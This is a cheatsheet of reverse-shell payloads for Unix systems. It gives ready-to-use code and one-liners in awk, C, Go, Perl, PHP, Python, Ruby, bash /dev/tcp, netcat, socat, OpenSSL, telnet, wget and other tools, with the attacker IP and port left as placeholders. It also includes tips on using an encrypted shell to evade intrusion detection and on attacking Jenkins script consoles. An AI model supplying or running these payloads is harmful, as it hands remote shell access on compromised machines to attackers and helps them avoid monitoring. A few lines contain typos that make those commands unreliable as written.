UNIX Reverse Shells Cheatsheet

Table of contents :
Listening IP
Listening Port


awk

RHOST=<placeholder_ip>
RPORT=<placeholder_port>
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
    s = "/inet/tcp/0/" RHOST "/" RPORT;
    while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'

C

#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>

#define REV_IP   "<placeholder_ip>"
#define REV_PORT <placeholder_port>

int main(int argc, char *argv[]) {
    struct sockaddr_in sa;
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(REV_IP);
    sa.sin_port = htons(REV_PORT);
    int s = socket(AF_INET, SOCK_STREAM, 0);
    connect(s, (struct sockaddr *)&sa, sizeof(sa));
    dup2(s, 0);
    dup2(s, 1);
    dup2(s, 2);
    execve("/bin/sh", 0, 0);
    return 0;
}

Oneliner in shell to create and compile C reverse shell :

IP="<placeholder_ip>"; PORT=<placeholder_port>; printf "#include <stdio.h>\n#include <unistd.h>\n#include <arpa/inet.h>\n\nint main(int argc, char *argv[]){\n\tstruct sockaddr_in sa;\n\tsa.sin_family=AF_INET;\n\tsa.sin_addr.s_addr=inet_addr(\"$IP\");\n\tsa.sin_port=htons($PORT);\n\tint s = socket(AF_INET,SOCK_STREAM,0);\n\tconnect(s,(struct sockaddr *)&sa,sizeof(sa));\n\tdup2(s,0);\n\tdup2(s,1);\n\tdup2(s,2);\n\texecve(\"/bin/sh\",0,0);\n\treturn 0;\n}\n" > rev.c && gcc -Wall rev.c -o rev

Dart

import 'dart:io';
import 'dart:convert';

main() {
  Socket.connect("<placeholder_ip>",<placeholder_port>).then((socket) {
    socket.listen((data) {
      Process.start('powershell.exe', []).then((Process process) {
        process.stdin.writeln(new String.fromCharCodes(data).trim());
        process.stdout
          .transform(utf8.decoder)
          .listen((output) { socket.write(output); });
      });
    },
    onDone: () {
      socket.destroy();
    });
  });
}

Go

package main;
import "os/exec";
import "net";
func main(){
    c,_ := net.Dial("tcp","<placeholder_ip>:<placeholder_port>");
    cmd := exec.Command("/bin/sh");
    cmd.Stdin  = c;
    cmd.Stdout = c;
    cmd.Stderr = c;
    cmd.Run()
}

Oneliner version in a shell :

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<placeholder_ip>:<placeholder_port>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/e.go && go run /tmp/e.go && rm /tmp/e.go

Groovy

Groovy reverse shells are really useful to get a reverse shell on a Jenkins server, using the Script console in the administration panel.

String host="<placeholder_ip>";
int port=<placeholder_port>;
String cmd="/bin.sh";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<placeholder_ip>/<placeholder_port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Lua

In a Lua script :

require('socket');
require('os');
t = socket.tcp();
t:connect('<placeholder_ip>','<placeholder_port>');
os.execute('/bin/sh -i <&3 >&3 2>&3');

Oneliner from a shell :

lua -e "require('socket');require('os');t=socket.tcp();t:connect('<placeholder_ip>','<placeholder_port>');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Netcat

Netcat.traditional

nc -e /bin/sh <placeholder_ip> <placeholder_port>

New netcat

mkfifo /tmp/f;nc <placeholder_ip> <placeholder_port> 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f
mknode /tmp/f p;nc <placeholder_ip> <placeholder_port> 0</tmp/f|/bin/sh -i 2>&1|tee /tmp/f

Node.js

require('child_process').exec('bash -i >& /dev/tcp/<placeholder_ip>/<placeholder_port> 0>&1');
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(<placeholder_port>, "<placeholder_ip>", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

OpenSSL

Encrypted reverse shell

An Encrypted reverse shell can help avoid automatic detection by network security monitoring tools (such as Intrusion Detection Systems (IDS)). To create one, you need to generate an SSL certificate and start an SSL listener on your attacking machine, then run the reverse shell payload on the target machine.

  1. Generate SSL certificate:
openssl req -x509 -quiet -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  1. Start an SSL listener on your attacking machine using openssl:
openssl s_server -quiet -key key.pem -cert cert.pem -port <placeholder_port>
  1. Run the payload on target machine using openssl:

Short payload :

mkfifo /tmp/s;/bin/sh -i</tmp/s 2>&1|openssl s_client -quiet -connect <placeholder_ip>:<placeholder_port>>/tmp/s 2>/dev/null;rm /tmp/s

Detailled payload :

mkfifo /tmp/pipesocket
/bin/sh -i < /tmp/pipesocket 2>&1 \
    | openssl s_client -quiet -connect <placeholder_ip>:<placeholder_port> > /tmp/pipesocket 2>/dev/null
rm/tmp/pipesocket

Perl

use Socket
$ip = "<placeholder_ip>";
$port = <placeholder_port>;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
if(connect(S, sockaddr_in($port, inet_aton($ip)))){
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
};

Oneliner from a shell :

perl -e 'use Socket;$i="<placeholder_ip>";$p=<placeholder_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

With exec

php -r '$s=fsockopen("<placeholder_ip>",<placeholder_port>);exec("/bin/sh -i <&3 >&3 2>&3");'

With shell_exec

php -r '$s=fsockopen("<placeholder_ip>",<placeholder_port>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

With backticks

php -r '$s=fsockopen("<placeholder_ip>",<placeholder_port>);`/bin/sh -i <&3 >&3 2>&3`;'

With system

php -r '$s=fsockopen("<placeholder_ip>",<placeholder_port>);system("/bin/sh -i <&3 >&3 2>&3");'

With popen

php -r '$s=fsockopen("<placeholder_ip>",<placeholder_port>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Python

Using subprocess module

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<placeholder_ip>",<placeholder_port>))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])

Oneliner from a shell :

python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<placeholder_ip>",<placeholder_port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Using pty module

import pty, socket, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("<placeholder_ip>", <placeholder_port>));
os.dup2(s.fileno(), 0);
os.dup2(s.fileno(), 1);
os.dup2(s.fileno(), 2);
pty.spawn("/bin/sh")

Oneliner from a shell :

python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<placeholder_ip>",<placeholder_port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Ruby

f = TCPSocket.open("<placeholder_ip>",<placeholder_port>).to_i;
exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

Oneliner from a shell :

ruby -rsocket -e 'f=TCPSocket.open("<placeholder_ip>",<placeholder_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Shell

Shell with /dev/tcp

0<&196;exec 196<>/dev/tcp/<placeholder_ip>/<placeholder_port>; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/<placeholder_ip>/<placeholder_port> 0>&1

Shell with pipes and netcat

rm -f /tmp/p;mkfifo /tmp/p;cat /tmp/p|/bin/sh -i 2>&1|nc <placeholder_ip> <placeholder_port> >/tmp/p
rm -f /tmp/p;mknod /tmp/p p;cat /tmp/p|/bin/sh -i 2>&1|nc <placeholder_ip> <placeholder_port> >/tmp/p

Socat

socat tcp:<placeholder_ip>:<placeholder_port> exec:'bash -i',pty,stderr,setsid,sigint,sane &

TclSh

#!/usr/bin/tclsh
set s [socket <placeholder_ip> <placeholder_port>];
while 1 {
    puts -nonewline $s "$ ";
    flush $s;
    gets $s c;
    set e "exec $c";
    if {![catch {set r [eval $e]} err]} {
        puts $s $r;
    }
    flush $s;
}
close $s;

One liner :

echo 'set s [socket <placeholder_ip> <placeholder_port>];while 1 {puts -nonewline $s "\$ ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | /usr/bin/tclsh

Telnet

The “double telnet” version takes two ports, one for receiving commands (uplink) and one for sending back the results (downlink) :

telnet <placeholder_ip> <placeholder_port> | /bin/sh -i | telnet <placeholder_ip> 4445

You can also create pipe redirections like we did in the netcat reverse shell :

With mkfifo :

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet <placeholder_ip> <placeholder_port> > f

With mknod :

rm -f f;mknod f p&&telnet <placeholder_ip> <placeholder_port> 0<f|/bin/sh -i 1>f

Wget

More informations on this reverse shell, as well as the listener to use can be found in the article Constructing a reverse shell with wget.

IP=<placeholder_ip>;D=<placeholder_port>;U=$(($D + 1))
while true; do sleep 0.125; wget "http://${IP}:${U}" -o /dev/null -U "$($(wget -q "http://${IP}:${D}" -O- -o /dev/null 2>/dev/null) 2>&1 | base64 -w0)" 2>/dev/null; done